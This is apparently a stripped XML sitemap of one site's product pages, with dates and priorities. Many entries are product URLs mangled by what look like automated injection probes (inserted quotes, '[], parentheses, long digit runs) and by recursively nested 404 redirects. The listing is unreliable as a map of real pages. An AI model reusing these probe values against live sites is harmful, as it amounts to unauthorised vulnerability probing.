ï»??xml version="1.0" encoding="UTF-8"?> http://nysadhg.v3.hnrich.net/products/a97654ab-1b75-43e9-8966-21239fae3832_productinfo.html/002_product.html 0.5 2022-06-21 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html 0.5 2022-10-17 http://nysadhg.v3.hnrich.net/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html 0.5 2022-10-17 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html 0.5 2022-10-17 http://nysadhg.v3.hnrich.net/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html 0.5 2022-10-17 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html 0.5 2022-10-17 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html 0.5 2022-10-18 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2023-09-05 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2023-09-05 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2023-12-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-02-21 http://nysadhg.v3.hnrich.net/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e-99999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c99999999999999999999_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e99999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c-99999999999999999999_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9eyyyyyyyyyyyyyyyyyyyy_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530yyyyyyyyyyyyyyyyyyyy_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c99999999999999999999_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530-99999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c-99999999999999999999_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4yyyyyyyyyyyyyyyyyyyy_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e499999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/cyyyyyyyyyyyyyyyyyyyy_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c-99999999999999999999_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4-99999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c99999999999999999999_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d499999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4yyyyyyyyyyyyyyyyyyyy_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c99999999999999999999_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea99999999999999999999_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1eayyyyyyyyyyyyyyyyyyyy_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'%5b%5d_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea(_002_product.html? 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html 0.5 2024-04-11 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27%5b%5d_002_product.html%3f? 0.5 2024-04-15 